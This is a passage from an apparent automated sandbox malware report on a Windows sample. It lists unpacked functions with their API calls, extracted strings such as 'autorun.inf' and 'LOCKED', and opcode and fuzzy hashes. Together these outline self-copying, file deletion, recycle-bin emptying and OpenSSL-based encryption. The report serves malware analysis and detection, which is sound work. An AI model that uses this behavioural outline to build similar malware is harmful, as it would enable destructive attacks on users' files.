                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: AllocateHeap$_free
                                  • String ID:
                                  • API String ID: 1482568997-0
                                  • Opcode ID: e7daa54aa73211f6a8d6ea9ed5e656fd720b828c0e2e59352f18653c6a4c9d5d
                                  • Instruction ID: cd3d0d761625e6e8de3aef39692e02e8752e9b77eb1123938fcbe6558d2a8cc9
                                  • Opcode Fuzzy Hash: e7daa54aa73211f6a8d6ea9ed5e656fd720b828c0e2e59352f18653c6a4c9d5d
                                  • Instruction Fuzzy Hash: BFF0C8315411026EC7212A259C0CBAB376F9F81771BA4C11AFC1D97690DE30CD0382A4
                                  Function 0067718E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ca40bd8fa624ee56fc80d4f07313e90b17160b598c2c4c6dfab0ebd02e03d922
                                  • Instruction ID: 66aa17c21157da9e567ed0cef934a9c5e46010f2bbdc58589ac983f8abbade6d
                                  • Opcode Fuzzy Hash: ca40bd8fa624ee56fc80d4f07313e90b17160b598c2c4c6dfab0ebd02e03d922
                                  • Instruction Fuzzy Hash: C8E0E53510822266E7202A659C0479B3A5F9F023A0F9D9221AC0D96391CE20DC0183F4
                                  Function 005C8D5C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_000085EE,00000000,00000000,00000000), ref: 005C8D7F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 08e5de1ba353209b133e7d7f7d77bbd8607cc98ef95a1ad4ee222b8c1a38f3f7
                                  • Instruction ID: a776637613145481680ce11a42c5f228af51b61a66964db2916a5906f3b7a121
                                  • Opcode Fuzzy Hash: 08e5de1ba353209b133e7d7f7d77bbd8607cc98ef95a1ad4ee222b8c1a38f3f7
                                  • Instruction Fuzzy Hash: 68D09EF4652201BFFB691BA05D59F762A5EF751716F18151DB803C94D0DFB84C80D670
                                  Function 005C6BF0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000671D,00000000,00000000,00000000), ref: 005C6C09
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 6916c674857ea5f7e4718e19770aaa6766fbc18a07c4767a4cec63e966882c0b
                                  • Instruction ID: ae9e1f7540de8912d8cb44d9e8693e17511b2e11916b12bb836726561b31aa29
                                  • Opcode Fuzzy Hash: 6916c674857ea5f7e4718e19770aaa6766fbc18a07c4767a4cec63e966882c0b
                                  • Instruction Fuzzy Hash: D2D012A4A022007DFF101AE05E0AF372A8EFB4070AF80186EBC46C4090C6A44E408930
                                  Function 005CB87A Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B49B,00000000,00000000,00000000), ref: 005CB893
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: ac5f58c8b1e233e4eb3270a3ef6b5dae4d61c631e3d031ad484ff34e2af7b45d
                                  • Instruction ID: ce7d2e2a136afe6241c419b88b18f48dfae8df90c2e833d1ae4385569a40de4b
                                  • Opcode Fuzzy Hash: ac5f58c8b1e233e4eb3270a3ef6b5dae4d61c631e3d031ad484ff34e2af7b45d
                                  • Instruction Fuzzy Hash: E7D012B8E692007DFF18A2E08C1BF372B0FFB42B06F40551CFC01C0081C3688C008161
                                  Function 005CC338 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • SHEmptyRecycleBinW.SHELL32(00000000,00000000,00000007), ref: 005CC33E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: EmptyRecycle
                                  • String ID:
                                  • API String ID: 983236787-0
                                  • Opcode ID: 1cf6aadd9d6018cacac6e5d10003306e4105efad5813e96587a6c64f28b45b2c
                                  • Instruction ID: da8a3147cdccf518e1dd2854961b63ef893bc06e234756e08a0da12f9a50fe92
                                  • Opcode Fuzzy Hash: 1cf6aadd9d6018cacac6e5d10003306e4105efad5813e96587a6c64f28b45b2c
                                  • Instruction Fuzzy Hash: 23B0127438530263F7180334AC17F1614881B05B02F1050297207EC8D0CA9090114604
                                  Function 005C5C2D Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: b43ecde045c731e69df9120491a0ca1208878498431cc9183c319585c132fae2
                                  • Instruction ID: 321ff34d95ac1d3753ed41d2ce561121c2a638df99862879027ffa84ca3f0ed5
                                  • Opcode Fuzzy Hash: b43ecde045c731e69df9120491a0ca1208878498431cc9183c319585c132fae2
                                  • Instruction Fuzzy Hash: D9A002745715006EDF555710ED1DF153616B752701F40525562955417095512415D724
                                  Function 005C5CD2 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 500cc3fc37a6c495613edd531c2fc827a796abac97f5fca630dab39b0ea25222
                                  • Instruction ID: f1f57faa3a94edb32eaca82ccb27c23f8d97fb9d60ab3a44190b53754a336fc2
                                  • Opcode Fuzzy Hash: 500cc3fc37a6c495613edd531c2fc827a796abac97f5fca630dab39b0ea25222
                                  • Instruction Fuzzy Hash: 1FA00270972100BFEF165B21FD0EF153B2BF742B42F602369B641990B0A6A23811DB38

                                  Non-executed Functions

                                  Function 005C9585 Relevance: 98.4, APIs: 18, Strings: 38, Instructions: 437stringfileprocessCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentVariableW.KERNEL32(?,?,00000400), ref: 005C96E6
                                  • lstrcpyW.KERNEL32(?,00000000), ref: 005C9715
                                  • lstrcatW.KERNEL32(?), ref: 005C9729
                                  • lstrcatW.KERNEL32(?,00000023), ref: 005C976F
                                  • lstrlenW.KERNEL32(?,005C590E), ref: 005C97A3
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 005C97E5
                                  • lstrlenW.KERNEL32(0000005C), ref: 005C97F3
                                  • FindFirstFileW.KERNEL32(?,?), ref: 005C9860
                                  • DeleteFileW.KERNEL32(?), ref: 005C988D
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 005C98A3
                                  • FindClose.KERNEL32(00000000), ref: 005C98AE
                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,00008000), ref: 005C9A05
                                  • CopyFileW.KERNEL32(00000000,?,00000000), ref: 005C9A1C
                                  • GetCommandLineW.KERNEL32 ref: 005C9A2D
                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 005C9A3A
                                  • lstrlenW.KERNEL32(00000000), ref: 005C9A48
                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C9A97
                                  • ExitProcess.KERNEL32 ref: 005C9AA9
                                    • Part of subcall function 005C5CD2: RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: File$Findlstrlen$CommandCreateLineProcesslstrcat$ArgvCloseCopyDeleteDirectoryEnvironmentExitFirstFreeHeapModuleNameNextVariablelstrcpy
                                  • String ID: #$%$%$%$%$%$%$%$%$%$%$%$%$%$%$0$4$@$@$\$]$^$^$^$^#^$k$k$w$z$z$z$z$z$z$z$z$|$~
                                  • API String ID: 675711421-249533007
                                  • Opcode ID: 78f72355f6cf6fb8af57ec6edd766e2116a02e1e7c24e2610f280af4ba9a3add
                                  • Instruction ID: 61ea6d24f9b2c4e8da08d52f71f791e2629a3f6d0d8ac559895ba2c99529a26a
                                  • Opcode Fuzzy Hash: 78f72355f6cf6fb8af57ec6edd766e2116a02e1e7c24e2610f280af4ba9a3add
                                  • Instruction Fuzzy Hash: E4024F31D052CCEFDF11CBE8D988ADEBFB5AF22304F144099E484AB242D6755B4ACB65
                                  Function 005C8E2E Relevance: 61.8, APIs: 6, Strings: 29, Instructions: 543windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(006D2040,?), ref: 005C8EFA
                                  • GetCommandLineW.KERNEL32(?), ref: 005C8F3C
                                  • CommandLineToArgvW.SHELL32(00000000), ref: 005C8F43
                                  • MessageBoxA.USER32(00000000,00000000,006CAB4A,00040010), ref: 005C92B8
                                  • ExitProcess.KERNEL32 ref: 005C92C0
                                  • StrToIntW.SHLWAPI(?), ref: 005C9341
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CommandLine$ArgvExitMessageProcess
                                  • String ID: '$1$@ m$A$A$B$B$B$C$F$H$H$H$I$I$I$I$K$K$LOCKED$N$R$S$S$S$U$]zw{ffqw`4z{`q4g}nq5$_$f
                                  • API String ID: 494642019-2656225804
                                  • Opcode ID: 00da4e0b8dc14506e19732bae59eb6d9e65d0453dcdfca0442921e1bb5dbe321
                                  • Instruction ID: 49007ed61e6cf173648f8d0a56ba2ee1cfc223ff0269f4492e85201a2ebf4966
                                  • Opcode Fuzzy Hash: 00da4e0b8dc14506e19732bae59eb6d9e65d0453dcdfca0442921e1bb5dbe321
                                  • Instruction Fuzzy Hash: BD2280219092D9AEDF15DBFCD44DBEEBFB1BF62308F08444DD0816B243C6699A06C766
                                  Function 005C87DD Relevance: 48.4, APIs: 7, Strings: 25, Instructions: 365stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005C7109: InitializeCriticalSection.KERNEL32(?,?,005C5657), ref: 005C710D
                                    • Part of subcall function 005C7109: EnterCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7114
                                    • Part of subcall function 005C7109: LeaveCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7124
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1021
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C102F
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C105A
                                    • Part of subcall function 005C1000: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,00000001), ref: 005C1086
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1097
                                  • InitializeCriticalSection.KERNEL32(006D9898,?,?,00000000), ref: 005C883F
                                  • lstrcpyW.KERNEL32(success,00000074,?,?,00000000), ref: 005C88B7
                                  • lstrcpyW.KERNEL32(out of memory,2](])]}]2];]}]0]8]0]2]/]$]],?,?,00000000), ref: 005C8971
                                  • lstrcpyW.KERNEL32(no access,?,?,?,00000000), ref: 005C8A4A
                                  • lstrcpyW.KERNEL32(too small,?,?,?,00000000), ref: 005C8B24
                                  • lstrcpyW.KERNEL32(already,0000000C,?,?,00000000), ref: 005C8B7E
                                  • lstrcpyW.KERNEL32(corrupt,?,?,?,00000000), ref: 005C8C30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrcpy$CriticalSectionlstrlen$Initialize$ByteCharEnterLeaveMultiWide
                                  • String ID: #recycle$.386$2](])]}]2];]}]0]8]0]2]/]$]]$9$]$already$autorun.inf$b$corrupt$d$d$m$m$no access$out of memory$p$q$r$success$t$t$t$too small$x$~
                                  • API String ID: 3132918104-973384122
                                  • Opcode ID: 3cf617efb34de39dbbcadb1ff5ba4b765cbfb0c65711e2ed75ade063018e257e
                                  • Instruction ID: f142d03996f8c1b8379c2ecdee98f709fe4fc5e48d70b16eed594990979e391d
                                  • Opcode Fuzzy Hash: 3cf617efb34de39dbbcadb1ff5ba4b765cbfb0c65711e2ed75ade063018e257e
                                  • Instruction Fuzzy Hash: 6AF10121D092CCDEDF11CBECD585ADEBFB1AF22308F18409AD1947B343C2655A1ADB66
                                  Function 005F12E0 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 261encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F133C
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 005F1360
                                  • GetLastError.KERNEL32 ref: 005F1394
                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000000), ref: 005F13E3
                                  • CryptGetProvParam.ADVAPI32(00000000,00000002,00000000,00000001,00000001), ref: 005F141E
                                  • GetLastError.KERNEL32 ref: 005F1452
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F1481
                                  • CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 005F150F
                                  • GetLastError.KERNEL32 ref: 005F1562
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F15DC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Crypt$ContextErrorLast$ByteCharMultiParamProvReleaseWide$Acquire
                                  • String ID: %lX$%lu. %s$..\..\openssl-1.1.0f\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Error code= 0x$Got max container len %d$Listing containers CSP=%s, type = %d
                                  • API String ID: 2639310310-1232233274
                                  • Opcode ID: dbc0e1168791bdc183a80721f1a90c1b89d20760ea4498aded74f50dc7a9924b
                                  • Instruction ID: 3e611aae11858906c53b1d882594bd5bea03fb8097f0669db3fa6383515aeaa7
                                  • Opcode Fuzzy Hash: dbc0e1168791bdc183a80721f1a90c1b89d20760ea4498aded74f50dc7a9924b
                                  • Instruction Fuzzy Hash: 0D81C671A4170ABBDF20ABA5CC4AFBF7F6DFB44B14F500416FA05AB281D77499408764
                                  Function 005F06D0 Relevance: 23.2, APIs: 4, Strings: 9, Instructions: 410encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,00000000,?), ref: 005F070B
                                  • GetLastError.KERNEL32 ref: 005F073F
                                  • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,00000000,?), ref: 005F07B3
                                  • GetLastError.KERNEL32 ref: 005F07E7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CryptErrorExportLast
                                  • String ID: %lX$%lx$%ux$..\..\openssl-1.1.0f\engines\e_capi.c$DSS1$Error code= 0x$RSA1$aiKeyAlg=0x$magic=0x
                                  • API String ID: 1886928054-1658443189
                                  • Opcode ID: 0e4ac8bb9720c87b9f7126bdc29d5ced9af35a0670749ea7d6716905bbc1fd02
                                  • Instruction ID: 3534bf309aff891bd447a87830578be6ade4048ba5947fe8540ba06c720876f0
                                  • Opcode Fuzzy Hash: 0e4ac8bb9720c87b9f7126bdc29d5ced9af35a0670749ea7d6716905bbc1fd02
                                  • Instruction Fuzzy Hash: B0D14A70A083476FD721AB64CC46F3BFFE9BF94704F08495AF58896283E664D544C7A2
                                  Function 005F1600 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 150encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptEnumProvidersW.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,005EF3A9), ref: 005F1666
                                  • CryptEnumProvidersW.ADVAPI32(00000000,00000000,00000000,?,00000000,?), ref: 005F16A0
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,005EF3A9), ref: 005F1706
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,005EF3A9), ref: 005F1773
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
